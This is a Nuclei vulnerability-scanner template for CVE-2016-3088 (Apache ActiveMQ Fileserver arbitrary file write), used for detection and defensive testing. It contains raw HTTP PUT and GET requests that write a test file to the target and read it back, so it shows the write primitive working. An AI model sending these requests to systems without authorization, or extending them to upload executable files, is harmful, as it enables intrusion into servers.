nuclei-templates/http/cves/2016/CVE-2016-3088.yaml

52 lines
1.9 KiB
YAML

id: CVE-2016-3088
info:
name: Apache ActiveMQ Fileserver - Arbitrary File Write
author: fq_hsu
severity: critical
description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.
impact: |
An attacker can write arbitrary files on the server, potentially leading to remote code execution.
remediation: |
Upgrade to Apache ActiveMQ version 5.14.0 or later to fix the vulnerability.
reference:
- https://www.exploit-db.com/exploits/40857
- https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30
- http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt
- https://nvd.nist.gov/vuln/detail/CVE-2016-3088
- http://rhn.redhat.com/errata/RHSA-2016-2036.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-3088
cwe-id: CWE-20
epss-score: 0.83955
epss-percentile: 0.98197
cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: apache
product: activemq
tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive
variables:
rand1: '{{rand_int(11111111, 99999999)}}'
http:
- raw:
- |
PUT /fileserver/{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
{{rand1}}
- |
GET /fileserver/{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code_1==204"
- "status_code_2==200"
- "contains((body_2), '{{rand1}}')"
condition: and
# digest: 4b0a00483046022100e9a1fbdbfc3616b49ba2ff15da5b5dd08fb202de9369c7c6010efa0102d73e16022100d50ec529a814a6b36b3eb213e293e3fe010363dda46ad10ffa16f6d20bdef479:922c64590222798bb761d5b6d8e72950